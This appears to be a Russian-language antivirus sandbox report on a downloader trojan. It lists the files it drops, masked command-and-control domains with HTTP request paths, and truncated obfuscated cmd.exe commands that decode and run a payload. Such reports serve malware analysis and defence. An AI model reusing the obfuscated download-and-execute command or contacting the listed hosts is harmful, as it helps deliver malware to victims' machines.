Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M(CgLRcouT@87.3I-ZU\B:j9qW2\&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;4...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\928.exe
Сетевая активность
Подключается к
- 'lo###tec.com':80
- 'lo###tec.com':443
- 'ki####dedesign.com':80
- 'ma####ngrimme.nl':80
- 'de##rmc.pl':80
- 'ki####design.com':80
TCP
Запросы HTTP GET
- http://lo###tec.com/sipg4837
- http://ki####dedesign.com/SGJs3px
- http://ma####ngrimme.nl/iHhh9nAx
- http://de##rmc.pl/pub/pUgp3e2xL
- http://ki####design.com/vRlkcmrBo
- http://www.ka#######ding-photographer.com/index.php
- http://www.ka#######ding-photographer.com/
Другие
- 'lo###tec.com':443
UDP
- DNS ASK lo###tec.com
- DNS ASK ki####dedesign.com
- DNS ASK ma####ngrimme.nl
- DNS ASK de##rmc.pl
- DNS ASK ki####design.com
- DNS ASK ka#######ding-photographer.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M(CgLRcouT@87.3I-ZU\B:j9qW2\&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;4...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M(CgLRcouT@87.3I-ZU\B:j9qW2/&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;41;7;52;24;71;62;0;77;52;61;29;39;4;52;29...
